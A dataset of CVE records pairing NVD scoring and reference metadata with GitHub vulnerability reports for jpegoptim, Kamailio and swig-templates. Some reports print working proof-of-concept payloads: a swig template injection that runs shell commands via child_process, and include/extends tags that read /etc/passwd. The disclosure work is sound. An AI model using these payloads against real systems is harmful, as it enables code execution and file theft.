[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://github.com/tjko/jpegoptim/issues/132" }, { "source": "cve@mitre.org", "tags": null, "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/66ZW65INCWSQYIT5E6N6I6PE5D7R6EK7/" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://github.com/tjko/jpegoptim/issues/132" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": null, "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/66ZW65INCWSQYIT5E6N6I6PE5D7R6EK7/" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:jpegoptim_project:jpegoptim:1.5.2:*:*:*:*:*:*:*", "matchCriteriaId": "99160EA4-AEE6-43CA-AE29-D2D133BB6B17", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "787" ]
787
https://github.com/tjko/jpegoptim/issues/132
[ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ]
github.com
[ "tjko", "jpegoptim" ]
### **Desctiption** A heap-buffer-overflow has occurred when running program jpegoptim in function optimize at jpegoptim.c:691:12 ### **Version** ``` $ git log commit f20f0e8775335d9f44efc65285a6ca85451e2036 (HEAD -> master, tag: v1.5.2, origin/master, origin/HEAD) Author: Timo Kokkonen <tjko@iki.fi> Date: Fri Feb 10 18:00:41 2023 -0800 Bump version to v1.5.2 ``` ### **Steps to reproduce** ``` $ git clone https://github.com/tjko/jpegoptim.git jpegoptim-g $ cd jpegoptim-g $ CFLAGS="-g -fsanitize=address -fno-omit-frame-pointer" CXXFLAGS="-g -fsanitize=address -fno-omit-frame-pointer" ./configure --prefix=$PWD/build $ build/bin/jpegoptim --stdout stdout-heapoverflow ================================================================= ==3544758==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x631000010800 at pc 0x0000002708ae bp 0x7ffed5edb070 sp 0x7ffed5eda838 READ of size 88156 at 0x631000010800 thread T0 #0 0x2708ad in fwrite (/home/lzy/fuzz/oss/jpegoptim-g/jpegoptim+0x2708ad) #1 0x30dbc3 in optimize /home/lzy/fuzz/oss/jpegoptim-g/jpegoptim.c:1093:8 #2 0x3120e7 in main /home/lzy/fuzz/oss/jpegoptim-g/jpegoptim.c:1369:10 #3 0x7f588cf2d082 in __libc_start_main /build/glibc-KZwQYS/glibc-2.31/csu/../csu/libc-start.c:308:16 #4 0x2584bd in _start (/home/lzy/fuzz/oss/jpegoptim-g/jpegoptim+0x2584bd) 0x631000010800 is located 0 bytes to the right of 65536-byte region [0x631000000800,0x631000010800) allocated by thread T0 here: #0 0x2d371d in malloc (/home/lzy/fuzz/oss/jpegoptim-g/jpegoptim+0x2d371d) #1 0x30ad0f in optimize /home/lzy/fuzz/oss/jpegoptim-g/jpegoptim.c:691:12 #2 0x3120e7 in main /home/lzy/fuzz/oss/jpegoptim-g/jpegoptim.c:1369:10 #3 0x7f588cf2d082 in __libc_start_main /build/glibc-KZwQYS/glibc-2.31/csu/../csu/libc-start.c:308:16 SUMMARY: AddressSanitizer: heap-buffer-overflow (/home/lzy/fuzz/oss/jpegoptim-g/jpegoptim+0x2708ad) in fwrite Shadow bytes around the buggy address: 0x0c627fffa0b0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0c627fffa0c0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0c627fffa0d0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0c627fffa0e0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0c627fffa0f0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 =>0x0c627fffa100:[fa]fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c627fffa110: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c627fffa120: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c627fffa130: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c627fffa140: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c627fffa150: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa Shadow byte legend (one shadow byte represents 8 application bytes): Addressable: 00 Partially addressable: 01 02 03 04 05 06 07 Heap left redzone: fa Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 Container overflow: fc Array cookie: ac Intra object redzone: bb ASan internal: fe Left alloca redzone: ca Right alloca redzone: cb Shadow gap: cc ==3544758==ABORTING ``` ### **POC** [https://github.com/blu3sh0rk/Fuzzing-crash/blob/main/jpegoptim/stdout-heapoverflow](url) ### **Code in function optimize at jpegoptim.c:691:12** ``` /* Prepare to decompress */ if (stdin_mode || stdout_mode) { if (inbuffer) free(inbuffer); inbuffersize=65536; inbuffer=malloc(inbuffersize); <---- line 691 if (!inbuffer) fatal("not enough memory"); } global_error_counter=0; jpeg_save_markers(&dinfo, JPEG_COM, 0xffff); for (j=0;j<=15;j++) { jpeg_save_markers(&dinfo, JPEG_APP0+j, 0xffff); } ``` ### **Environment** ``` Ubuntu 20.04.3 LTS \n \l ``` ### **IMPACT** Potentially causing DoS and RCE
Heap-buffer-overflow n function optimize at jpegoptim.c:691:12
https://api.github.com/repos/tjko/jpegoptim/issues/132/comments
1
2023-03-02T02:38:44Z
2023-03-03T01:51:19Z
https://github.com/tjko/jpegoptim/issues/132
1,606,006,836
132
4,839
CVE-2020-27507
2023-03-15T20:15:10.283
The Kamailio SIP before 5.5.0 server mishandles INVITE requests with duplicated fields and overlength tag, leading to a buffer overflow that crashes the server or possibly have unspecified other impact.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" }, { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 5.9, "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Patch" ], "url": "https://github.com/kamailio/kamailio/commit/ada3701d22b1fd579f06b4f54fa695fa988e685f" }, { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking" ], "url": "https://github.com/kamailio/kamailio/issues/2503" }, { "source": "cve@mitre.org", "tags": null, "url": "https://lists.debian.org/debian-lts-announce/2023/05/msg00030.html" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Patch" ], "url": "https://github.com/kamailio/kamailio/commit/ada3701d22b1fd579f06b4f54fa695fa988e685f" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking" ], "url": "https://github.com/kamailio/kamailio/issues/2503" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": null, "url": "https://lists.debian.org/debian-lts-announce/2023/05/msg00030.html" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:kamailio:kamailio:*:*:*:*:*:*:*:*", "matchCriteriaId": "A19355E8-CCDE-477C-A7F6-B5AAB6140C3B", "versionEndExcluding": "5.5.0", "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "120" ]
120
https://github.com/kamailio/kamailio/issues/2503
[ "Exploit", "Issue Tracking" ]
github.com
[ "kamailio", "kamailio" ]
### Description I am experimenting with fuzzing on Kamailio SIP. A malformed INVITE (with a long tag) crashes the server, raised by qm_debug_check_frag(). ### Troubleshooting The error message: ``` qm_debug_check_frag(): BUG: qm: fragm. 0x7ffff03642e8 (address 0x7ffff0364320) end overwritten (9191919191919191, 9191919191919191)! Memory allocator was called from tm: t_reply.c:2410. Fragment marked by tm: t_msgbuilder.c:327. Exec from core/mem/q_malloc.c:511. ``` Output from GDB: ``` (gdb) watch *0x7ffff0364320 Hardware watchpoint 1: *0x7ffff0364320 (gdb) run -f kamailio-basic.cfg -L src/modules -Y runtime_dir/ -n 1 -D -E Starting program: /home/rnatella/workdir-sip/kamailio/src/kamailio -f kamailio-basic.cfg -L src/modules -Y runtime_dir/ -n 1 -D -E [Thread debugging using libthread_db enabled] Using host libthread_db library "/lib/x86_64-linux-gnu/libthread_db.so.1". 0(29450) INFO: <core> [core/sctp_core.c:75]: sctp_core_check_support(): SCTP API not enabled - if you want to use it, load sctp module Listening on udp: 127.0.0.1 [127.0.0.1]:5060 Aliases: WARNING: no fork mode 0(29450) INFO: rr [./../outbound/api.h:52]: ob_load_api(): unable to import bind_ob - maybe module is not loaded 0(29450) INFO: rr [rr_mod.c:185]: mod_init(): outbound module not available 0(29450) INFO: <core> [main.c:2841]: main(): processes (at least): 4 - shm size: 67108864 - pkg size: 8388608 0(29450) INFO: <core> [core/udp_server.c:154]: probe_max_receive_buffer(): SO_RCVBUF is initially 212992 0(29450) INFO: <core> [core/udp_server.c:206]: probe_max_receive_buffer(): SO_RCVBUF is finally 425984 0(29450) ERROR: {1 2 INVITE 1-670@127.0.0.1} <core> [core/parser/parse_rr.c:78]: do_parse_rr_body(): Failed parsing name-addr (<sip:127.0"0tttttttttttttttttttttttttttK-670-1-7) 0(29450) ERROR: {1 2 INVITE 1-670@127.0.0.1} <core> [core/parser/parse_rr.c:140]: do_parse_rr_body(): Failed parsing rr header body [<sip:127.0"0tttttttttttttttttttttttttttK-670-1-7] 0(29450) ERROR: {1 2 INVITE 1-670@127.0.0.1} rr [loose.c:468]: find_rem_target(): failed to parse last Route HF 0(29450) ERROR: {1 2 INVITE 1-670@127.0.0.1} rr [loose.c:700]: after_strict(): searching for last Route URI failed Hardware watchpoint 1: *0x7ffff0364320 Old value = <unreadable> New value = 4932352 __memmove_sse2_unaligned_erms () at ../sysdeps/x86_64/multiarch/memmove-vec-unaligned-erms.S:316 316 ../sysdeps/x86_64/multiarch/memmove-vec-unaligned-erms.S: No such file or directory. (gdb) bt #0 __memmove_sse2_unaligned_erms () at ../sysdeps/x86_64/multiarch/memmove-vec-unaligned-erms.S:316 #1 0x00007ffff602e4ff in build_local_reparse (Trans=<optimized out>, branch=<optimized out>, len=<optimized out>, method=<optimized out>, method_len=<optimized out>, to=<optimized out>, reason=<optimized out>) at t_msgbuilder.c:336 #2 0x00007ffff607eaff in build_ack (rpl=<optimized out>, trans=<optimized out>, branch=0, ret_len=<optimized out>) at t_reply.c:360 #3 reply_received (p_msg=<optimized out>) at t_reply.c:2398 #4 0x00000000005a0af3 in do_forward_reply (msg=0x7ffff68eed28, mode=<optimized out>) at core/forward.c:757 #5 0x0000000000688cae in receive_msg (buf=<optimized out>, len=<optimized out>, rcv_info=<optimized out>) at core/receive.c:509 #6 0x00000000004a6b39 in udp_rcv_loop () at core/udp_server.c:543 #7 0x000000000042c938 in main_loop () at main.c:1480 #8 0x000000000043c574 in main (argc=<optimized out>, argv=<optimized out>) at main.c:2863 (gdb) frame 1 #1 0x00007ffff602e4ff in build_local_reparse (Trans=<optimized out>, branch=<optimized out>, len=<optimized out>, method=<optimized out>, method_len=<optimized out>, to=<optimized out>, reason=<optimized out>) at t_msgbuilder.c:336 336 append_str(d, method, method_len); (gdb) print d $1 = 0x7ffff0364320 "" (gdb) c Continuing. Hardware watchpoint 1: *0x7ffff0364320 Old value = 4932352 New value = 4932417 __memmove_sse2_unaligned_erms () at ../sysdeps/x86_64/multiarch/memmove-vec-unaligned-erms.S:317 317 ../sysdeps/x86_64/multiarch/memmove-vec-unaligned-erms.S: No such file or directory. (gdb) bt #0 __memmove_sse2_unaligned_erms () at ../sysdeps/x86_64/multiarch/memmove-vec-unaligned-erms.S:317 #1 0x00007ffff602e4ff in build_local_reparse (Trans=<optimized out>, branch=<optimized out>, len=<optimized out>, method=<optimized out>, method_len=<optimized out>, to=<optimized out>, reason=<optimized out>) at t_msgbuilder.c:336 #2 0x00007ffff607eaff in build_ack (rpl=<optimized out>, trans=<optimized out>, branch=0, ret_len=<optimized out>) at t_reply.c:360 #3 reply_received (p_msg=<optimized out>) at t_reply.c:2398 #4 0x00000000005a0af3 in do_forward_reply (msg=0x7ffff68eed28, mode=<optimized out>) at core/forward.c:757 #5 0x0000000000688cae in receive_msg (buf=<optimized out>, len=<optimized out>, rcv_info=<optimized out>) at core/receive.c:509 #6 0x00000000004a6b39 in udp_rcv_loop () at core/udp_server.c:543 #7 0x000000000042c938 in main_loop () at main.c:1480 #8 0x000000000043c574 in main (argc=<optimized out>, argv=<optimized out>) at main.c:2863 (gdb) c Continuing. Hardware watchpoint 1: *0x7ffff0364320 Old value = 4932417 New value = 541803329 0x00007ffff602e504 in build_local_reparse (Trans=<optimized out>, branch=<optimized out>, len=<optimized out>, method=<optimized out>, method_len=<optimized out>, to=<optimized out>, reason=<optimized out>) at t_msgbuilder.c:337 337 *d = ' '; (gdb) bt #0 0x00007ffff602e504 in build_local_reparse (Trans=<optimized out>, branch=<optimized out>, len=<optimized out>, method=<optimized out>, method_len=<optimized out>, to=<optimized out>, reason=<optimized out>) at t_msgbuilder.c:337 #1 0x00007ffff607eaff in build_ack (rpl=<optimized out>, trans=<optimized out>, branch=0, ret_len=<optimized out>) at t_reply.c:360 #2 reply_received (p_msg=<optimized out>) at t_reply.c:2398 #3 0x00000000005a0af3 in do_forward_reply (msg=0x7ffff68eed28, mode=<optimized out>) at core/forward.c:757 #4 0x0000000000688cae in receive_msg (buf=<optimized out>, len=<optimized out>, rcv_info=<optimized out>) at core/receive.c:509 #5 0x00000000004a6b39 in udp_rcv_loop () at core/udp_server.c:543 #6 0x000000000042c938 in main_loop () at main.c:1480 #7 0x000000000043c574 in main (argc=<optimized out>, argv=<optimized out>) at main.c:2863 (gdb) c Continuing. 0(29450) CRITICAL: {2 2 INVITE 1-670@127.0.0.1} <core> [core/mem/q_malloc.c:138]: qm_debug_check_frag(): BUG: qm: fragm. 0x7ffff03642e8 (address 0x7ffff0364320) end overwritten (9191919191919191, 9191919191919191)! Memory allocator was called from tm: t_reply.c:2410. Fragment marked by tm: t_msgbuilder.c:327. Exec from core/mem/q_malloc.c:511. Program received signal SIGSEGV, Segmentation fault. 0x000000000082f45f in qm_status (qmp=<optimized out>) at core/mem/q_malloc.c:902 902 f!=&(qm->free_hash[h].head); f=f->u.nxt_free, i++, j++){ ``` #### Reproduction I am running the server with a basic configuration (attached kamailio-basic.cfg), using the command: ``` ./src/kamailio -f kamailio-basic.cfg -L src/modules -Y runtime_dir/ -n 1 -D -E ``` [kamailio-basic.cfg.txt](https://github.com/kamailio/kamailio/files/5354439/kamailio-basic.cfg.txt) On the same machine, I am sending the malformed message (also attached): ``` cat sip-crash.txt | nc -4u -w1 localhost 5060 ``` [sip-crash.txt](https://github.com/kamailio/kamailio/files/5354468/sip-crash.txt) You can find more information about my fuzzing setup at: [https://github.com/rnatella/aflnet-kamailio-sip](https://github.com/rnatella/aflnet-kamailio-sip) #### Debugging Data <!-- If you got a core dump, use gdb to extract troubleshooting data - full backtrace, local variables and the list of the code at the issue location. gdb /path/to/kamailio /path/to/corefile bt full info locals list If you are familiar with gdb, feel free to attach more of what you consider to be relevant. --> See previous section #### Log Messages <!-- Check the syslog file and if there are relevant log messages printed by Kamailio, add them next, or attach to issue, or provide a link to download them (e.g., to a pastebin site). --> See previous section #### SIP Traffic <!-- If the issue is exposed by processing specific SIP messages, grab them with ngrep or save in a pcap file, then add them next, or attach to issue, or provide a link to download them (e.g., to a pastebin site). --> See previos section ### Possible Solutions <!-- If you found a solution or workaround for the issue, describe it. Ideally, provide a pull request with a fix. --> ### Additional Information * **Kamailio Version** - output of `kamailio -v` ``` version: kamailio 5.5.0-dev2 (x86_64/linux) 6049a1-dirty flags: USE_TCP, USE_TLS, USE_SCTP, TLS_HOOKS, USE_RAW_SOCKS, DISABLE_NAGLE, USE_MCAST, DNS_IP_HACK, SHM_MMAP, PKG_MALLOC, Q_MALLOC, F_MALLOC, TLSF_MALLOC, DBG_SR_MEMORY, DBG_QM_MALLOC, USE_FUTEX, FAST_LOCK-ADAPTIVE_WAIT, USE_DNS_CACHE, USE_DNS_FAILOVER, USE_NAPTR, USE_DST_BLACKLIST, HAVE_RESOLV_RES, TLS_PTHREAD_MUTEX_SHARED ADAPTIVE_WAIT_LOOPS 1024, MAX_RECV_BUFFER_SIZE 262144, MAX_URI_SIZE 1024, BUF_SIZE 65535, DEFAULT PKG_SIZE 8MB poll method support: poll, epoll_lt, epoll_et, sigio_rt, select. id: 6049a1 -dirty compiled on 10:12:13 Oct 9 2020 with /home/rnatella/aflnet/afl-clang-fast 6.0 ``` * **Operating System**: <!-- Details about the operating system, the type: Linux (e.g.,: Debian 8.4, Ubuntu 16.04, CentOS 7.1, ...), MacOS, xBSD, Solaris, ...; Kernel details (output of `uname -a`) --> ``` Ubuntu 18.04.2 LTS Linux dockertest1 4.15.0-109-generic #110-Ubuntu SMP Tue Jun 23 02:39:32 UTC 2020 x86_64 x86_64 x86_64 GNU/Linux ```
Crash on qm_debug_check_frag() on INVITE
https://api.github.com/repos/kamailio/kamailio/issues/2503/comments
7
2020-10-09T11:01:33Z
2020-10-12T12:35:40Z
https://github.com/kamailio/kamailio/issues/2503
718,055,250
2,503
4,840
CVE-2023-25344
2023-03-15T20:15:10.480
An issue was discovered in swig-templates thru 2.0.4 and swig thru 1.4.2, allows attackers to execute arbitrary code via crafted Object.prototype anonymous function.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking" ], "url": "https://github.com/node-swig/swig-templates/issues/89" }, { "source": "cve@mitre.org", "tags": [ "Exploit" ], "url": "https://www.gem-love.com/2023/02/01/Swig%E6%A8%A1%E6%9D%BF%E5%BC%95%E6%93%8E0day%E6%8C%96%E6%8E%98-%E4%BB%A3%E7%A0%81%E6%89%A7%E8%A1%8C%E5%92%8C%E6%96%87%E4%BB%B6%E8%AF%BB%E5%8F%96/" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking" ], "url": "https://github.com/node-swig/swig-templates/issues/89" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit" ], "url": "https://www.gem-love.com/2023/02/01/Swig%E6%A8%A1%E6%9D%BF%E5%BC%95%E6%93%8E0day%E6%8C%96%E6%8E%98-%E4%BB%A3%E7%A0%81%E6%89%A7%E8%A1%8C%E5%92%8C%E6%96%87%E4%BB%B6%E8%AF%BB%E5%8F%96/" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:swig-templates_project:swig-templates:*:*:*:*:*:*:*:*", "matchCriteriaId": "CDF2B020-C983-43DB-83BA-1A5E2FF7DBA4", "versionEndExcluding": null, "versionEndIncluding": "2.0.4", "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:swig_project:swig:*:*:*:*:*:*:*:*", "matchCriteriaId": "C1966097-7D59-4D16-92D5-DA88F6D426E9", "versionEndExcluding": null, "versionEndIncluding": "1.4.2", "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "94" ]
94
https://github.com/node-swig/swig-templates/issues/89
[ "Exploit", "Issue Tracking" ]
github.com
[ "node-swig", "swig-templates" ]
# official doc - <https://node-swig.github.io/swig-templates/docs/tags/#include> # poc tpl.html ``` You need to ensure that the 1.html file exists {% include "./1.html"+Object.constructor("global.process.mainModule.require('child_process').exec('open -a Calculator.app')")() %} or just use /etc/passwd {% include "/etc/passwd"+Object.constructor("global.process.mainModule.require('child_process').exec('open -a Calculator.app')")() %} ``` run.js ```javascript var swig = require('swig-templates'); var output = swig.renderFile('/Users/bytedance/Desktop/swig/tpl.html'); console.log(output); ``` the code above will execute `open -a Calculator.app` command ![m1-134808_ia1CFt](http://cdn2.pic.y1ng.vip/uPic/2023/02/01/m1-134808_ia1CFt.png) gif: <http://cdn2.pic.y1ng.vip/uPic/2023/02/01/m1-134548_iShot_2023-02-01_13.45.05.gif> # Reason include.js will do some code splicing https://github.com/node-swig/swig-templates/blob/313bed1faa42e310d9dca4cd05d384439d26ec63/lib/tags/include.js#L39-L52 the return value will be added to var `out` https://github.com/node-swig/swig-templates/blob/313bed1faa42e310d9dca4cd05d384439d26ec63/lib/parser.js#L891-L899 finally the value of `out`: ```javascript _output += _swig.compileFile("/etc/passwd", {resolveFrom: "/Users/bytedance/Desktop/swig/tpl.html"})(_utils.extend({}, _ctx, + (((((typeof _ctx.Object !== "undefined" && _ctx.Object !== null && _ctx.Object.constructor !== undefined && _ctx.Object.constructor !== null) ? ((typeof _ctx.Object !== "undefined" && _ctx.Object !== null && _ctx.Object.constructor !== undefined && _ctx.Object.constructor !== null) ? _ctx.Object.constructor : "") : ((typeof Object !== "undefined" && Object !== null && Object.constructor !== undefined && Object.constructor !== null) ? Object.constructor : "")) !== null ? ((typeof _ctx.Object !== "undefined" && _ctx.Object !== null && _ctx.Object.constructor !== undefined && _ctx.Object.constructor !== null) ? ((typeof _ctx.Object !== "undefined" && _ctx.Object !== null && _ctx.Object.constructor !== undefined && _ctx.Object.constructor !== null) ? _ctx.Object.constructor : "") : ((typeof Object !== "undefined" && Object !== null && Object.constructor !== undefined && Object.constructor !== null) ? Object.constructor : "")) : "" ) || _fn).call((((typeof _ctx.Object !== "undefined" && _ctx.Object !== null) ? ((typeof _ctx.Object !== "undefined" && _ctx.Object !== null) ? _ctx.Object : "") : ((typeof Object !== "undefined" && Object !== null) ? Object : "")) !== null ? ((typeof _ctx.Object !== "undefined" && _ctx.Object !== null) ? ((typeof _ctx.Object !== "undefined" && _ctx.Object !== null) ? _ctx.Object : "") : ((typeof Object !== "undefined" && Object !== null) ? Object : "")) : "" ), "global.process.mainModule.require('child_process').exec('open -a Calculator.app')") || _fn)())); ``` the `out` will be used to make an anonymous function, and then call the function ![m1-140208_EIzVeN](http://cdn2.pic.y1ng.vip/uPic/2023/02/01/m1-140208_EIzVeN.png) if you debug in detail, you will find that it will `call` the following anonymous funciton: ```javascript (function anonymous( ) { global.process.mainModule.require('child_process').exec('open -a Calculator.app') }) ```
Security Issue: code execution vulnerability during template rendering
https://api.github.com/repos/node-swig/swig-templates/issues/89/comments
1
2023-02-01T06:09:21Z
2023-02-01T11:47:28Z
https://github.com/node-swig/swig-templates/issues/89
1,565,496,121
89
4,841
CVE-2023-25345
2023-03-15T20:15:10.533
Directory traversal vulnerability in swig-templates thru 2.0.4 and swig thru 1.4.2, allows attackers to read arbitrary files via the include or extends tags.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 7.5, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" }, { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 7.5, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 3.6, "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking" ], "url": "https://github.com/node-swig/swig-templates/issues/88" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking" ], "url": "https://github.com/node-swig/swig-templates/issues/88" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:swig-templates_project:swig-templates:*:*:*:*:*:*:*:*", "matchCriteriaId": "CDF2B020-C983-43DB-83BA-1A5E2FF7DBA4", "versionEndExcluding": null, "versionEndIncluding": "2.0.4", "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:swig_project:swig:*:*:*:*:*:*:*:*", "matchCriteriaId": "C1966097-7D59-4D16-92D5-DA88F6D426E9", "versionEndExcluding": null, "versionEndIncluding": "1.4.2", "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "22" ]
22
https://github.com/node-swig/swig-templates/issues/88
[ "Exploit", "Issue Tracking" ]
github.com
[ "node-swig", "swig-templates" ]
official doc: - <https://node-swig.github.io/swig-templates/docs/tags/#include> - <https://node-swig.github.io/swig-templates/docs/tags/#extends> poc: ``` 1.html {% extends '../../../../../etc/passwd' %} {% include '../../../../../etc/passwd' %} ``` ```javascript // run.js var swig = require('swig'); var output = swig.renderFile('/Users/bytedance/Desktop/swig/tpl.html'); console.log(output); ``` output: ![m1-133941_byZ4O5](http://cdn2.pic.y1ng.vip/uPic/2023/02/01/m1-133941_byZ4O5.png)
Security Issue: arbitrary local file read vulnerability during template rendering
https://api.github.com/repos/node-swig/swig-templates/issues/88/comments
0
2023-02-01T05:40:21Z
2023-02-01T05:40:21Z
https://github.com/node-swig/swig-templates/issues/88
1,565,469,101
88
4,842
CVE-2023-26912
2023-03-15T20:15:10.683
Cross site scripting (XSS) vulnerability in xenv S-mall-ssm thru commit 3d9e77f7d80289a30f67aaba1ae73e375d33ef71 on Feb 17, 2020, allows local attackers to execute arbitrary code via the evaluate button.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 4.8, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "HIGH", "scope": "CHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N", "version": "3.1" }, "exploitabilityScore": 1.7, "impactScore": 2.7, "source": "nvd@nist.gov", "type": "Primary" }, { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 4.8, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "HIGH", "scope": "CHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N", "version": "3.1" }, "exploitabilityScore": 1.7, "impactScore": 2.7, "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Vendor Advisory" ], "url": "https://github.com/xenv/S-mall-ssm/issues/37" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Vendor Advisory" ], "url": "https://github.com/xenv/S-mall-ssm/issues/37" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:s-mall-ssm_project:s-mall-ssm:*:*:*:*:*:*:*:*", "matchCriteriaId": "8861040C-CF3F-4818-A8F4-D8E229E1F0CA", "versionEndExcluding": "2020-02-17", "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "79" ]
79
https://github.com/xenv/S-mall-ssm/issues/37
[ "Exploit", "Issue Tracking", "Vendor Advisory" ]
github.com
[ "xenv", "S-mall-ssm" ]
